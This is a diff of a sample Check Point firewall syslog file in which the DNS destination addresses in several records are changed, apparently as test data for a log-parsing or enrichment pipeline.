 <134>1 2020-03-29T17:25:18Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d9fe,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50640"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T17:25:18Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d9fe,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50641"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T17:25:18Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d9fe,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50642"; service:"443"; service_id:"https"; src:"192.168.1.117"]
-<134>1 2020-03-29T17:25:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da08,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56454"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:25:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da18,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502744"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42604"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da08,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56454"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da18,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502744"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42604"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:25:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80da1a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:25:47Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80da1b,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50643"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T17:25:47Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80da1b,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50644"; service:"443"; service_id:"https"; src:"192.168.1.117"]
-<134>1 2020-03-29T17:25:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da22,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502754"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45073"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da22,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502754"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45073"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:25:54Z gw-da58d3 CheckPoint 8363 - [flags:"311296"; ifdir:"outbound"; ifname:"eth1"; loguid:"{0x5e80d9f0,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; log_id:"2"; product:"Anti Malware"]
-<134>1 2020-03-29T17:25:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da22,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502754"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35591"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:25:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da22,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502754"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53972"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da22,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502754"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35591"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da22,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502754"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53972"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:25:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da22,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"216.58.208.106"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"48772"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:25:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da22,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"216.58.208.106"; log_delay:"1585502754"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"48774"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:25:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da25,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502757"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50145"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:25:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da25,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502757"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33465"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:25:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da25,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502757"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42628"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:25:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da25,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502757"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59548"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da25,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502757"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50145"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da25,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502757"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33465"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da25,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502757"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42628"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80da25,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502757"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59548"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:25:58Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80da26,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53818"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:25:58Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80da26,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"34740"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10068"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T17:25:58Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80da26,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56150"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
